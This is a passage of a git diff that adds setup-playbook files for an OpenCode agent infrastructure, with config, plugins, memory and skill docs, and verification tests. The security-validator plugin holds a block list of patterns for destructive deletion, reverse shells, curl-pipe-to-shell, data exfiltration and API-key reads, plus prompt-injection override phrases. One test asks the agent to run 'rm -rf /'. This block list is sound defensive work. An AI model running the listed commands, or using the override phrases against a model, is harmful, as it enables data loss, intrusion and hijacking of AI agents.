Structure Completeness + +- [ ] All required directories planned +- [ ] All required files identified +- [ ] Memory files initialized with proper structure +- [ ] Core skill has appropriate description +- [ ] Skill names follow OpenCode naming convention (lowercase with hyphens) + +### 3. Configuration Validity + +- [ ] opencode.json is valid JSON +- [ ] opencode.json has correct schema reference +- [ ] config.yaml is valid YAML +- [ ] VERSION file contains valid semver +- [ ] File paths are correct + +### 4. Content Quality + +- [ ] AGENTS.md follows standard template +- [ ] SKILL.md files have valid frontmatter +- [ ] Memory update instruction is present +- [ ] Organization context is included + +### 5. OpenCode-Specific Validation + +- [ ] Skill names are lowercase alphanumeric with hyphens +- [ ] Skill descriptions are under 1024 characters +- [ ] Plugin files export proper Plugin type +- [ ] opencode.json plugin references match file names + +### 6. Safety Checks + +- [ ] No existing files will be overwritten without backup +- [ ] No sensitive data in templates +- [ ] Permissions are appropriate +- [ ] No destructive operations planned + +## Validation Matrix + +| Component | Required | Planned | Valid | +|-----------|----------|---------|-------| +| AGENTS.md | Yes | | | +| opencode.json | Yes | | | +| .opencode/ | Yes | | | +| VERSION | Yes | | | +| config/config.yaml | Yes | | | +| skill/core/SKILL.md | Yes | | | +| memory/ | Yes | | | +| plugin/ | Yes | | | + +## OpenCode Naming Rules + +### Skill Names +- Must be 1-64 characters +- Lowercase alphanumeric only +- Single hyphens allowed (not at start/end) +- Pattern: `^[a-z0-9]+(-[a-z0-9]+)*$` + +**Valid:** `core`, `create-skill`, `code-review`, `my-custom-skill` +**Invalid:** `Core`, `create_skill`, `my--skill`, `-skill` + +### Plugin Names +- Should match directory/file naming +- Use kebab-case for consistency +- Export matches file name + +## Risk Assessment + +### Low Risk +- Creating new directories +- 
Creating new files in empty locations +- Adding README.md placeholder files + +### Medium Risk +- Overwriting existing AGENTS.md +- Modifying existing opencode.json +- Adding new plugins + +### High Risk (Require Confirmation) +- Overwriting existing memory files +- Deleting existing content +- Modifying existing skills +- Changing plugin configurations + +## Pre-Implementation Checklist + +Before proceeding to implementation: + +- [ ] All directories identified +- [ ] All file contents drafted +- [ ] Agent identity finalized +- [ ] Skill names validated against naming rules +- [ ] Plugin structure matches OpenCode Plugin type +- [ ] Backup plan for existing files (if applicable) +- [ ] No blocking issues identified + +## Approval Gate + +Implementation can proceed when: +1. All required components are planned +2. All content passes validation +3. No high-risk operations without mitigation +4. Structure matches OpenCode infrastructure specification +5. All naming conventions are followed + +## Next Phase + +If evaluation passes, proceed to **4_IMPLEMENT.md** to execute the installation. diff --git a/Setup/OpenCode-Cognitive-Infrastructure/4_IMPLEMENT.md b/Setup/OpenCode-Cognitive-Infrastructure/4_IMPLEMENT.md new file mode 100644 index 0000000..e13b040 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/4_IMPLEMENT.md @@ -0,0 +1,1057 @@ +# Phase 4: Implement Installation + +## Objective + +Execute the complete OpenCode Cognitive Infrastructure installation including the Plugin System, Memory System, and Skills System. 
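
The fresh-vs-upgrade decision from Phase 0 can be automated before Part 1 runs. A minimal sketch (paths per this playbook; `detectInstallMode` is a hypothetical helper, not one of the shipped plugins) that probes `.opencode/VERSION`:

```typescript
import { existsSync, readFileSync } from "fs";
import { join } from "path";

type InstallMode = { mode: "fresh" } | { mode: "upgrade"; fromVersion: string };

// An existing .opencode/VERSION file marks a prior install; its
// contents tell migration logic which version we are upgrading from.
function detectInstallMode(agentDir: string): InstallMode {
  const versionFile = join(agentDir, ".opencode", "VERSION");
  if (!existsSync(versionFile)) {
    return { mode: "fresh" };
  }
  return { mode: "upgrade", fromVersion: readFileSync(versionFile, "utf8").trim() };
}

console.log(detectInstallMode("/nonexistent-agent")); // mode: "fresh"
```

On a fresh install the steps below run as written; on an upgrade, memory files are preserved first (see Phase 0's Installation Modes).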
+ +--- + +## Part 1: Directory Structure + +### Step 1.1: Create Base Directory Tree + +```bash +mkdir -p .opencode/{config,command,agents,docs} +mkdir -p .opencode/skill/{core,create-skill} +mkdir -p .opencode/plugin +mkdir -p .opencode/memory/{state,signals,work,learning/{observe,think,plan,build,execute,verify}} +mkdir -p .opencode/memory/{research,sessions,learnings,decisions,execution,security,recovery,raw-outputs,backups} +``` + +### Step 1.2: Create VERSION File + +```bash +echo "1.0.0" > .opencode/VERSION +``` + +--- + +## Part 2: Plugin System + +The Plugin System provides event-driven automation through TypeScript plugins that intercept tool executions and lifecycle events. + +### Step 2.1: Create opencode.json + +Create `opencode.json` in the agent root: + +```json +{ + "$schema": "https://opencode.ai/config.json", + "plugins": { + "security-validator": { + "enabled": true + }, + "session-manager": { + "enabled": true + }, + "event-logger": { + "enabled": true + }, + "context-loader": { + "enabled": true + } + }, + "skill": { + "allow": ["*"], + "deny": [] + }, + "agents": { + "build": { + "model": "anthropic:claude-sonnet-4-20250514" + }, + "plan": { + "model": "anthropic:claude-sonnet-4-20250514" + } + } +} +``` + +### Step 2.2: Create Security Validator Plugin + +Create `.opencode/plugin/security-validator.ts`: + +```typescript +import type { Plugin } from "@opencode-ai/plugin"; + +// Attack pattern categories - 10 tiers of protection +const ATTACK_PATTERNS = { + // Tier 1: Catastrophic - Always block + catastrophic: { + patterns: [ + /rm\s+(-rf?|--recursive)\s+[\/~]/i, + /rm\s+(-rf?|--recursive)\s+\*/i, + />\s*\/dev\/sd[a-z]/i, + /mkfs\./i, + /dd\s+if=.*of=\/dev/i, + ], + action: "block", + message: "BLOCKED: Catastrophic deletion/destruction detected", + }, + + // Tier 2: Reverse shells - Always block + reverseShell: { + patterns: [ + /bash\s+-i\s+>&\s*\/dev\/tcp/i, + /nc\s+(-e|--exec)\s+\/bin\/(ba)?sh/i, + /python.*socket.*connect/i, + 
/perl.*socket.*connect/i, + /ruby.*TCPSocket/i, + /php.*fsockopen/i, + /socat.*exec/i, + /\|\s*\/bin\/(ba)?sh/i, + ], + action: "block", + message: "BLOCKED: Reverse shell pattern detected", + }, + + // Tier 3: Credential theft - Always block + credentialTheft: { + patterns: [ + /curl.*\|\s*(ba)?sh/i, + /wget.*\|\s*(ba)?sh/i, + /curl.*(-o|--output).*&&.*chmod.*\+x/i, + /base64\s+-d.*\|\s*(ba)?sh/i, + ], + action: "block", + message: "BLOCKED: Remote code execution pattern detected", + }, + + // Tier 4: Prompt injection indicators - Block and log + promptInjection: { + patterns: [ + /ignore\s+(all\s+)?previous\s+instructions/i, + /disregard\s+(all\s+)?prior\s+instructions/i, + /you\s+are\s+now\s+(in\s+)?[a-z]+\s+mode/i, + /new\s+instruction[s]?:/i, + /system\s+prompt:/i, + /\[INST\]/i, + /<\|im_start\|>/i, + ], + action: "block", + message: "BLOCKED: Prompt injection pattern detected", + }, + + // Tier 5: Environment manipulation - Warn + envManipulation: { + patterns: [ + /export\s+(ANTHROPIC|OPENAI|AWS|AZURE)_/i, + /echo\s+\$\{?(ANTHROPIC|OPENAI)_/i, + /env\s*\|.*KEY/i, + /printenv.*KEY/i, + ], + action: "warn", + message: "WARNING: Environment/credential access detected", + }, + + // Tier 6: Git dangerous operations - Require confirmation + gitDangerous: { + patterns: [ + /git\s+push.*(-f|--force)/i, + /git\s+reset\s+--hard/i, + /git\s+clean\s+-fd/i, + /git\s+checkout\s+--\s+\./i, + ], + action: "warn", + message: "WARNING: Potentially destructive git operation", + }, + + // Tier 7: System modification - Log + systemMod: { + patterns: [ + /chmod\s+777/i, + /chown\s+root/i, + /sudo\s+/i, + /systemctl\s+(stop|disable)/i, + ], + action: "log", + message: "LOGGED: System modification command", + }, + + // Tier 8: Network operations - Log + network: { + patterns: [/ssh\s+/i, /scp\s+/i, /rsync.*:/i, /curl\s+(-X\s+POST|--data)/i], + action: "log", + message: "LOGGED: Network operation", + }, + + // Tier 9: Data exfiltration patterns - Block + exfiltration: { + patterns: 
[/curl.*(@|--upload-file)/i, /tar.*\|.*curl/i, /zip.*\|.*nc/i], + action: "block", + message: "BLOCKED: Data exfiltration pattern detected", + }, + + // Tier 10: Infrastructure protection - Block + infraProtection: { + patterns: [/rm.*\.opencode/i, /rm.*\.config/i], + action: "block", + message: "BLOCKED: Infrastructure protection triggered", + }, +}; + +function validateCommand(command: string): { + allowed: boolean; + message?: string; + action?: string; +} { + if (!command || command.length < 3) { + return { allowed: true }; + } + + for (const [tierName, tier] of Object.entries(ATTACK_PATTERNS)) { + for (const pattern of tier.patterns) { + if (pattern.test(command)) { + console.error(`[Security] ${tierName}: ${tier.message}`); + console.error(`[Security] Command: ${command.substring(0, 100)}...`); + return { + allowed: tier.action !== "block", + message: tier.message, + action: tier.action, + }; + } + } + } + + return { allowed: true }; +} + +export const SecurityValidator: Plugin = async ({ client, $ }) => { + return { + tool: { + execute: { + before: async (input, output) => { + // Check if this is a shell/bash command + if (input.name === "shell" || input.name === "bash") { + const command = input.input?.command || input.input?.cmd || ""; + const validation = validateCommand(command); + + if (!validation.allowed) { + throw new Error(validation.message); + } + + if (validation.action === "warn") { + console.warn(validation.message); + } + } + }, + }, + }, + }; +}; + +export default SecurityValidator; +``` + +### Step 2.3: Create Session Manager Plugin + +Create `.opencode/plugin/session-manager.ts`: + +```typescript +import type { Plugin } from "@opencode-ai/plugin"; +import { writeFileSync, existsSync, mkdirSync, readFileSync } from "fs"; + +const MEMORY_DIR = ".opencode/memory"; +const STATE_DIR = `${MEMORY_DIR}/state`; +const SESSIONS_DIR = `${MEMORY_DIR}/sessions`; + +export const SessionManager: Plugin = async ({ client, $ }) => { + // Initialize session 
on plugin load + const sessionId = `session_${Date.now()}`; + const startedAt = new Date().toISOString(); + + // Ensure directories exist + if (!existsSync(STATE_DIR)) { + mkdirSync(STATE_DIR, { recursive: true }); + } + if (!existsSync(SESSIONS_DIR)) { + mkdirSync(SESSIONS_DIR, { recursive: true }); + } + + // Write initial session state + const sessionState = { + session_id: sessionId, + started_at: startedAt, + status: "active", + }; + + writeFileSync( + `${STATE_DIR}/active-session.json`, + JSON.stringify(sessionState, null, 2) + ); + + console.log(`[Session] Initialized: ${sessionId}`); + + return { + event: async ({ event }) => { + // Handle session end + if (event.type === "session.idle") { + const summary = { + session_id: sessionId, + started_at: startedAt, + ended_at: new Date().toISOString(), + status: "completed", + }; + + writeFileSync( + `${SESSIONS_DIR}/${sessionId}.json`, + JSON.stringify(summary, null, 2) + ); + + console.log(`[Session] Summary saved: ${sessionId}`); + } + }, + }; +}; + +export default SessionManager; +``` + +### Step 2.4: Create Event Logger Plugin + +Create `.opencode/plugin/event-logger.ts`: + +```typescript +import type { Plugin } from "@opencode-ai/plugin"; +import { appendFileSync, existsSync, mkdirSync } from "fs"; + +const RAW_OUTPUT_DIR = ".opencode/memory/raw-outputs"; + +export const EventLogger: Plugin = async ({ client, $ }) => { + // Ensure directory exists + if (!existsSync(RAW_OUTPUT_DIR)) { + mkdirSync(RAW_OUTPUT_DIR, { recursive: true }); + } + + return { + tool: { + execute: { + after: async (input, output) => { + try { + const logEntry = { + timestamp: new Date().toISOString(), + tool_name: input.name, + tool_input: input.input, + success: !output.error, + }; + + // Append to daily log file + const today = new Date().toISOString().split("T")[0]; + const logFile = `${RAW_OUTPUT_DIR}/${today}.jsonl`; + + appendFileSync(logFile, JSON.stringify(logEntry) + "\n"); + } catch (error) { + // Silent fail - logging should 
never break execution + } + }, + }, + }, + }; +}; + +export default EventLogger; +``` + +### Step 2.5: Create Context Loader Plugin + +Create `.opencode/plugin/context-loader.ts`: + +```typescript +import type { Plugin } from "@opencode-ai/plugin"; +import { readFileSync, existsSync } from "fs"; + +const CORE_SKILL_PATH = ".opencode/skill/core/SKILL.md"; +const AGENTS_PATH = "AGENTS.md"; + +export const ContextLoader: Plugin = async ({ client, $ }) => { + // Load core context at startup + let coreContext = ""; + let agentIdentity = ""; + + if (existsSync(CORE_SKILL_PATH)) { + coreContext = readFileSync(CORE_SKILL_PATH, "utf-8"); + console.log("[Context] Core skill loaded"); + } + + if (existsSync(AGENTS_PATH)) { + agentIdentity = readFileSync(AGENTS_PATH, "utf-8"); + console.log("[Context] Agent identity loaded"); + } + + return { + // Context is loaded at plugin initialization + // Available for reference throughout the session + }; +}; + +export default ContextLoader; +``` + +--- + +## Part 3: Memory System + +The Memory System provides persistent knowledge across sessions using a three-tier architecture. + +### Step 3.1: Create Memory README + +Create `.opencode/memory/README.md`: + +```markdown +# Memory System + +Persistent memory architecture for session history, learnings, and operational state. 
+ +## Directory Structure + +| Directory | Purpose | Retention | +| -------------- | ---------------------------- | --------------- | +| `research/` | Deep research outputs | Permanent | +| `sessions/` | Session summaries | Rolling 90 days | +| `learnings/` | Learning moments | Permanent | +| `decisions/` | Architectural Decision Records | Permanent | +| `execution/` | Task execution logs | Rolling 30 days | +| `security/` | Security event logs | Permanent | +| `recovery/` | Recovery snapshots | Rolling 7 days | +| `raw-outputs/` | JSONL event streams | Rolling 7 days | +| `backups/` | Pre-refactoring backups | As needed | +| `state/` | Current operational state | Active | +| `signals/` | Pattern detection | Active | +| `work/` | Per-task memory | Active | +| `learning/` | Phase-based learnings | Permanent | + +## Three-Tier Memory Model + +### 1. CAPTURE (Hot) - Per-Task Work + +Current work items in `work/[task-name_timestamp]/`: + +- `work.md` - Goal, result, signal tracking +- `trace.jsonl` - Decision trace +- `output/` - Deliverables produced + +### 2. SYNTHESIS (Warm) - Aggregated Learning + +Learnings organized by phase in `learning/`: + +- `observe/` - Context gathering learnings +- `think/` - Hypothesis generation learnings +- `plan/` - Execution planning learnings +- `build/` - Success criteria learnings +- `execute/` - Implementation learnings +- `verify/` - Verification learnings + +### 3. APPLICATION (Cold) - Archived History + +Historical data organized by date in main directories. 
+ +## Privacy + +Add to .gitignore: + +``` +.opencode/memory/raw-outputs/ +.opencode/memory/sessions/ +.opencode/memory/security/ +``` +``` + +### Step 3.2: Initialize State Files + +Create `.opencode/memory/state/active-work.json`: + +```json +{ + "current_task": null, + "started_at": null, + "status": "idle" +} +``` + +### Step 3.3: Initialize Signal Files + +Create `.opencode/memory/signals/README.md`: + +```markdown +# Signals + +Real-time pattern detection and anomaly tracking. + +## Signal Files + +| File | Purpose | +| ----------------- | --------------------------- | +| `failures.jsonl` | VERIFY failures with context | +| `loopbacks.jsonl` | Phase loopback events | +| `patterns.jsonl` | Weekly aggregated patterns | + +## Format + +Each file uses JSONL (JSON Lines) format - one JSON object per line. +``` + +--- + +## Part 4: Skills System + +The Skills System provides modular domain expertise with on-demand loading. + +### Step 4.1: Create Core Skill + +Create `.opencode/skill/core/SKILL.md`: + +```markdown +--- +name: core +description: Core identity and configuration. Provides agent identity, capabilities overview, and operating principles. USE WHEN session begins OR user asks about identity, capabilities, or how the agent works. +--- + +# Core - Agent Identity + +**Auto-loads at session start.** This skill defines agent identity and core operating principles. + +## Examples + +**Example: Identity query** + +``` +User: "Who are you?" +-> Reads core skill +-> Returns identity information +``` + +**Example: Capability check** + +``` +User: "What can you do?" 
+-> Lists available capabilities +-> References other skills if installed +``` + +--- + +## Identity + +**Agent:** +**Role:** +**Organization:** + +--- + +## Available Capabilities + +- **Memory System**: Persistent knowledge across sessions +- **Skills Framework**: Modular domain expertise +- **Plugin System**: Event-driven automation +- **MCP Integration**: External tool access + +--- + +## Quick Reference + +- Skills directory: `.opencode/skill/` +- Memory directory: `.opencode/memory/` +- Configuration: `opencode.json` +``` + +### Step 4.2: Create Skill System Documentation + +Create `.opencode/docs/SKILLSYSTEM.md`: + +```markdown +# OpenCode Skill System + +The configuration system for all skills. + +## Skill Structure + +Every skill follows this structure: + +``` +skill-name/ +├── SKILL.md # Main skill file (required) +├── context.md # Additional context (optional) +├── tools/ # CLI tools +│ └── tool-name.ts +└── workflows/ # Execution workflows + └── workflow-name.md +``` + +## SKILL.md Format + +### YAML Frontmatter + +```yaml +--- +name: skill-name +description: [What it does]. USE WHEN [intent triggers]. [Additional capabilities]. +--- +``` + +**Rules:** + +- `name` must be lowercase alphanumeric with hyphens +- `name` pattern: `^[a-z0-9]+(-[a-z0-9]+)*$` +- `name` length: 1-64 characters +- `description` is a single line, max 1024 characters +- `USE WHEN` keyword is recommended for activation + +### Markdown Body + +```markdown +# skill-name + +[Brief description] + +## Workflow Routing + +| Workflow | Trigger | File | +| ---------- | ------------ | ----------------------- | +| **Create** | "create new" | `workflows/create.md` | + +## Examples + +**Example 1:** + +User: "[Request]" +-> [Action taken] +-> [Result] +``` + +## Skill Loading + +1. **Discovery**: OpenCode scans skill directories at startup +2. **Metadata**: Only YAML frontmatter loads initially +3. **Invocation**: Full SKILL.md body loads when agent calls skill +4. 
**Workflow Execution**: Additional files load on-demand + +## Skill Locations + +OpenCode searches these locations (in order): + +1. `.opencode/skill/<skill-name>/SKILL.md` (project) +2. `~/.config/opencode/skill/<skill-name>/SKILL.md` (global) +3. `.claude/skills/<skill-name>/SKILL.md` (Claude-compatible) +4. `~/.claude/skills/<skill-name>/SKILL.md` (Claude-compatible global) + +## Permission Control + +In `opencode.json`: + +```json +{ + "skill": { + "allow": ["*"], + "deny": ["internal-*"] + } +} +``` + +- `allow` - immediate access +- `deny` - hidden from agents +- Patterns support wildcards +``` + +### Step 4.3: Create the create-skill Skill + +Create `.opencode/skill/create-skill/SKILL.md`: + +```markdown +--- +name: create-skill +description: Creates new skills following the standard structure. USE WHEN user wants to create a new skill OR add new capability OR needs a custom workflow. +--- + +# create-skill + +Creates properly structured skills following the OpenCode Skills System specification. + +## Workflow Routing + +| Workflow | Trigger | File | +| ---------- | -------------------------- | ----------------------- | +| **Create** | "create skill", "new skill" | `workflows/create.md` | + +## Examples + +**Example: Create a code-review skill** + +``` +User: "Create a skill for code review" +-> Creates .opencode/skill/code-review/SKILL.md +-> Adds proper YAML frontmatter with USE WHEN +-> Creates workflows/ and tools/ directories +-> Returns confirmation with skill path +``` + +## Skill Template + +When creating a skill, use this template: + +```markdown +--- +name: skill-name +description: [Purpose]. USE WHEN [triggers].
+--- + +# skill-name + +[Description] + +## Workflow Routing + +| Workflow | Trigger | File | +| -------- | ------- | ---- | + +## Examples + +**Example:** + +User: "[Request]" +-> [Process] +-> [Result] +``` + +## Naming Rules + +- Lowercase alphanumeric only +- Hyphens allowed (not at start/end) +- Pattern: `^[a-z0-9]+(-[a-z0-9]+)*$` +- Length: 1-64 characters + +**Valid:** `code-review`, `my-skill`, `api-client` +**Invalid:** `Code-Review`, `my_skill`, `--skill` +``` + +--- + +## Part 5: Documentation + +### Step 5.1: Create Memory System Documentation + +Create `.opencode/docs/MEMORYSYSTEM.md`: + +```markdown +# OpenCode Memory System + +Persistent memory architecture for maintaining context across sessions. + +## Architecture + +### Three-Tier Model + +| Tier | Temperature | Purpose | Location | +| --------------- | ----------- | ---------------------- | ----------------- | +| **CAPTURE** | Hot | Active work items | `memory/work/` | +| **SYNTHESIS** | Warm | Phase-based learnings | `memory/learning/`| +| **APPLICATION** | Cold | Historical archive | `memory/sessions/`| + +### CAPTURE (Hot) + +Per-task memory stored in `work/[task-name_timestamp]/`: + +- `work.md` - Goal, result, signal tracking +- `trace.jsonl` - Decision trace +- `output/` - Deliverables produced + +### SYNTHESIS (Warm) + +Learnings organized by cognitive phase: + +- `observe/` - Context gathering insights +- `think/` - Hypothesis and analysis +- `plan/` - Execution planning +- `build/` - Construction learnings +- `execute/` - Implementation notes +- `verify/` - Validation results + +### APPLICATION (Cold) + +Long-term storage organized by date/category: + +- `sessions/` - Session summaries +- `decisions/` - Architectural Decision Records +- `research/` - Research outputs +- `learnings/` - Permanent learning moments + +## State Management + +Active state tracked in `memory/state/`: + +- `active-work.json` - Current task state +- `active-session.json` - Session info + +## Signal Detection + 
+Pattern detection in `memory/signals/`: + +- `failures.jsonl` - Failure patterns +- `loopbacks.jsonl` - Retry patterns +- `patterns.jsonl` - Aggregated patterns + +## Retention Policy + +| Directory | Retention | +| -------------- | --------------- | +| `raw-outputs/` | 7 days | +| `recovery/` | 7 days | +| `execution/` | 30 days | +| `sessions/` | 90 days | +| Others | Permanent | +``` + +### Step 5.2: Create Plugin System Documentation + +Create `.opencode/docs/PLUGINSYSTEM.md`: + +```markdown +# OpenCode Plugin System + +Event-driven automation through TypeScript plugins. + +## Plugin Structure + +```typescript +import type { Plugin } from "@opencode-ai/plugin"; + +export const MyPlugin: Plugin = async ({ client, $ }) => { + return { + tool: { + execute: { + before: async (input, output) => { + // Before tool execution + }, + after: async (input, output) => { + // After tool execution + }, + }, + }, + event: async ({ event }) => { + // Handle lifecycle events + }, + }; +}; + +export default MyPlugin; +``` + +## Available Hooks + +### Tool Execution + +- `before` - Execute before any tool runs +- `after` - Execute after tool completion + +### Lifecycle Events + +- `session.idle` - Session completed + +## Configuration + +In `opencode.json`: + +```json +{ + "plugins": { + "plugin-name": { + "enabled": true + } + } +} +``` + +## Plugin Contexts + +| Context | Purpose | +| -------- | -------------------------- | +| `client` | OpenCode API access | +| `$` | Shell command execution | +| `app` | Application instance | +| `event` | Event stream data | + +## Installed Plugins + +| Plugin | Purpose | +| -------------------- | --------------------------- | +| `security-validator` | 10-tier command validation | +| `session-manager` | Session lifecycle handling | +| `event-logger` | Tool execution logging | +| `context-loader` | Context initialization | + +## Security Validator Tiers + +1. Catastrophic (BLOCK) - rm -rf, disk destruction +2. 
Reverse Shells (BLOCK) - bash -i, netcat shells +3. Credential Theft (BLOCK) - curl|sh patterns +4. Prompt Injection (BLOCK) - instruction manipulation +5. Environment Manipulation (WARN) - API key access +6. Git Dangerous (WARN) - force push, hard reset +7. System Modification (LOG) - chmod, sudo +8. Network Operations (LOG) - ssh, scp +9. Data Exfiltration (BLOCK) - upload patterns +10. Infrastructure Protection (BLOCK) - rm .opencode +``` + +--- + +## Part 6: Agent Identity + +### Step 6.1: Create config.yaml + +Create `.opencode/config/config.yaml`: + +```yaml +version: "1.0.0" +infrastructure: + name: "OpenCode Cognitive Infrastructure" + installed: "" + +agent: + name: "" + persona: "" + type: "" + organization: "" + +settings: + memory_update_frequency: "every_turn" + context_loading: "progressive" + skill_activation: "trigger_based" + +capabilities: + memory: true + skills: true + plugins: true + mcp: true +``` + +### Step 6.2: Create Root AGENTS.md + +Create `AGENTS.md` in the agent root directory, replacing the `{{...}}` placeholders with the agent's details: + +```markdown +# {{AGENT_NAME}}: {{AGENT_ROLE}} + +## Your Name + +Your name is **{{PERSONA_NAME}}**. You are the {{AGENT_ROLE}} for {{ORGANIZATION}}. + +## Your Mission + +{{MISSION_STATEMENT}} + +## Your Role + +{{ROLE_DESCRIPTION}} + +## Core Responsibilities + +### Primary Functions + +- {{PRIMARY_FUNCTION_1}} +- {{PRIMARY_FUNCTION_2}} +- {{PRIMARY_FUNCTION_3}} + +### Supporting Tasks + +- {{SUPPORTING_TASK_1}} +- {{SUPPORTING_TASK_2}} + +## System Architecture + +You operate within the OpenCode Cognitive Infrastructure: + +- **Skills Framework** (`.opencode/skill/`): Modular domain expertise +- **Memory System** (`.opencode/memory/`): Persistent knowledge +- **Plugin System** (`.opencode/plugin/`): Event-driven automation +- **Configuration** (`opencode.json`): Runtime settings + +## Memory Management + +**CRITICAL:** Update work status after EVERY conversation turn to maintain continuity.
- Read relevant memories before starting work +- Update memories after significant interactions +- Keep work status current at `.opencode/memory/state/` + +## Organization Context + +{{ORGANIZATION_CONTEXT}} + +--- + +_OpenCode Cognitive Infrastructure v1.0.0_ +``` + +--- + +## Part 7: Gitignore Configuration + +### Step 7.1: Create/Update .gitignore + +Add to `.gitignore` in agent root: + +```gitignore +# OpenCode Cognitive Infrastructure - Private Data +.opencode/memory/raw-outputs/ +.opencode/memory/sessions/ +.opencode/memory/security/ +.opencode/memory/state/ +.opencode/memory/signals/ +.opencode/memory/work/ + +# Keep structure but ignore contents +!.opencode/memory/.gitkeep +!.opencode/memory/state/.gitkeep +``` + +### Step 7.2: Create .gitkeep Files + +```bash +touch .opencode/memory/.gitkeep +touch .opencode/memory/state/.gitkeep +touch .opencode/memory/signals/.gitkeep +touch .opencode/memory/work/.gitkeep +touch .opencode/memory/learning/.gitkeep +``` + +--- + +## Part 8: Plugin Dependencies + +### Step 8.1: Initialize Package.json (Optional) + +If using npm for plugin dependencies: + +```bash +cd .opencode/plugin +npm init -y +npm install @opencode-ai/plugin --save-dev +``` + +Or with bun: + +```bash +cd .opencode/plugin +bun init -y +bun add @opencode-ai/plugin --dev +``` + +--- + +## Post-Implementation Checklist + +After all files are created: + +- [ ] Verify all directories exist +- [ ] Validate JSON syntax in opencode.json +- [ ] Validate YAML syntax in config.yaml +- [ ] Ensure plugin files have valid TypeScript syntax +- [ ] Verify skill names follow naming convention +- [ ] Verify AGENTS.md has been customized with agent identity +- [ ] Confirm .gitignore excludes sensitive data +- [ ] Test OpenCode can start in directory: `opencode` + +--- + +## Next Phase + +Proceed to **5_VERIFY.md** to verify the installation.
diff --git a/Setup/OpenCode-Cognitive-Infrastructure/5_VERIFY.md b/Setup/OpenCode-Cognitive-Infrastructure/5_VERIFY.md new file mode 100644 index 0000000..9445d53 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/5_VERIFY.md @@ -0,0 +1,251 @@ +# Phase 5: Verify Installation + +## Objective + +Verify the OpenCode Cognitive Infrastructure is correctly installed and functional. + +## Verification Checklist + +### 1. Directory Structure + +Verify all directories exist: + +- [ ] `.opencode/` directory exists +- [ ] `.opencode/config/` exists +- [ ] `.opencode/skill/core/` exists +- [ ] `.opencode/skill/create-skill/` exists +- [ ] `.opencode/plugin/` exists +- [ ] `.opencode/memory/` exists +- [ ] `.opencode/memory/state/` exists +- [ ] `.opencode/memory/signals/` exists +- [ ] `.opencode/memory/learning/` exists +- [ ] `.opencode/command/` exists +- [ ] `.opencode/agents/` exists +- [ ] `.opencode/docs/` exists + +### 2. Core Files + +Verify essential files are in place: + +- [ ] `AGENTS.md` exists in agent root +- [ ] `opencode.json` exists in agent root +- [ ] `.opencode/VERSION` contains "1.0.0" +- [ ] `.opencode/config/config.yaml` exists and is valid YAML +- [ ] `.opencode/skill/core/SKILL.md` exists +- [ ] `.opencode/skill/create-skill/SKILL.md` exists + +### 3. Plugin System + +Verify plugins are properly configured: + +- [ ] `.opencode/plugin/security-validator.ts` exists +- [ ] `.opencode/plugin/session-manager.ts` exists +- [ ] `.opencode/plugin/event-logger.ts` exists +- [ ] `.opencode/plugin/context-loader.ts` exists +- [ ] `opencode.json` references all plugins +- [ ] Plugin files have valid TypeScript syntax + +### 4. Memory System + +Verify memory files: + +- [ ] `.opencode/memory/README.md` exists +- [ ] `.opencode/memory/state/active-work.json` exists +- [ ] `.opencode/memory/signals/README.md` exists +- [ ] Learning phase directories exist (observe, think, plan, build, execute, verify) + +### 5. 
Skills System + +Verify skill configuration: + +- [ ] Skill names are lowercase with hyphens +- [ ] SKILL.md files have valid YAML frontmatter +- [ ] Core skill has `USE WHEN` in description +- [ ] `opencode.json` has skill permissions configured + +### 6. Content Validation + +#### AGENTS.md +- [ ] Contains agent name +- [ ] Contains persona name +- [ ] Contains mission statement +- [ ] Contains role description +- [ ] Contains memory management instructions + +#### opencode.json +- [ ] Valid JSON syntax +- [ ] Has `$schema` reference +- [ ] Contains plugins configuration +- [ ] Contains skill permissions + +#### core/SKILL.md +- [ ] Valid YAML frontmatter +- [ ] Name is lowercase (`core`) +- [ ] Description under 1024 characters +- [ ] Contains `USE WHEN` trigger + +## Functional Testing + +### Test 1: OpenCode Startup + +```bash +opencode +``` + +**Expected**: OpenCode starts without errors and loads the agent context. + +### Test 2: Skill Discovery + +In OpenCode, ask: "What skills are available?" + +**Expected**: OpenCode should list the core and create-skill skills. + +### Test 3: Identity Check + +Ask the agent: "Who are you?" + +**Expected**: Agent should respond with its persona name, role, and purpose from AGENTS.md. + +### Test 4: Memory Access + +Ask the agent: "What's your current work status?" + +**Expected**: Agent should read and report from `.opencode/memory/state/`. + +### Test 5: Skill Invocation + +Ask: "Use the core skill" + +**Expected**: Agent should invoke the core skill and display identity information. + +### Test 6: Plugin Verification + +Run a safe shell command and check logs: + +```bash +# After running a command in OpenCode, check: +cat .opencode/memory/raw-outputs/$(date +%Y-%m-%d).jsonl +``` + +**Expected**: Event logger should have recorded the command execution. + +### Test 7: Security Validator + +In OpenCode, attempt: "Run `rm -rf /`" + +**Expected**: Security validator should BLOCK the command. 
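
Test 7 can also be sanity-checked outside OpenCode. The sketch below copies two of the block-tier regexes from `security-validator.ts` (an illustrative subset, not the full ten-tier set) and confirms they classify commands as expected:

```typescript
// Standalone check for a subset of the security-validator block patterns.
// Patterns copied verbatim from .opencode/plugin/security-validator.ts;
// run with ts-node or bun.
const blockPatterns: RegExp[] = [
  /rm\s+(-rf?|--recursive)\s+[\/~]/i, // Tier 1: catastrophic deletion
  /bash\s+-i\s+>&\s*\/dev\/tcp/i,     // Tier 2: reverse shell
];

function isBlocked(command: string): boolean {
  return blockPatterns.some((pattern) => pattern.test(command));
}

console.log(isBlocked("rm -rf /"));                          // true
console.log(isBlocked("bash -i >& /dev/tcp/10.0.0.1/4444")); // true
console.log(isBlocked("ls -la"));                            // false
```

This only mirrors the plugin; if a pattern change ever lets a dangerous command through, the fix belongs in `security-validator.ts` itself.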
